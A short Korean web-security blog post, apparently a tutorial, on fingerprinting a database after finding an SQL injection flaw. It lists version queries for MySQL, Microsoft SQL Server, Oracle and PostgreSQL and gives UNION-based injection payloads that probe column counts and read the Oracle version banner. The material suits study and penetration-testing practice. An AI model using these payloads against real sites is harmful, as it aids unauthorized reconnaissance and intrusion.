보안/WEB
[WEB 보안] 데이터베이스 버전 확인
블링손
2020. 4. 22. 13:46
반응형
: SQL Injection 취약점을 처음 식별 한 후에는 일반적으로 데이터베이스 자체에 대한 정보를 얻는것이 유용
1) 데이터베이스 유형 및 버전 조회
|
Database Type |
Query |
|
Microsoft, MySQL |
SELECT @@version |
|
Oracle |
SELECT * FROM v$version |
|
Postgre SQL |
SELECT version() |
ex) ' UNION SELECT @@version--
2) 쿼리에서 반환되는 열 수와 열을 텍스트 데이터를 포함, 쿼리가 카테고리 매개 변수에서 다음과 같은 페이로드를 사용하여 두개의 텍스트를 포함하는 두개의 열을 리턴하는지 확인(DB 종류 : Oracle)
'+UNION+SELECT+'abc','def'+FROM+DUAL--
3) 다음 페이로드를 사용하여 데이터베이스 버전 표시
'+UNION+SELECT+BANNER,+NULL+FROM+v$version--
반응형